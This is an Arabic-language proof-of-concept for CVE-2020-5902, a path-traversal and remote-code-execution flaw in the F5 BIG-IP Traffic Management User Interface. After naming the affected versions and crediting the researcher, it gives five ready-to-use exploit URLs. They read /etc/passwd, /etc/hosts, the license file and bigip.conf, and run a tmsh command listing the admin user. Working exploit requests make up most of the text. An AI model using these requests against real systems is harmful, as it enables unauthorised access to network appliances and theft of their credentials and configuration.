
إثبات المفهوم لـ CVE-2020-5902
في إصدارات BIG-IP 15.0.0-15.1.0.3، 14.1.0-14.1.2.5، 13.1.0-13.1.3.3، 12.1.0-12.1.5.1، و 11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (Traffic Management User Interface - TMUI)، والتي يُشار إليها أيضًا بأداة التكوين (Configuration utility)، على ثغرة تنفيذ أكواد عن بُعد (RCE) في صفحات غير معلنة.
الاعتماد: Mikhail Klyuchnikov من Positive Technologies
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin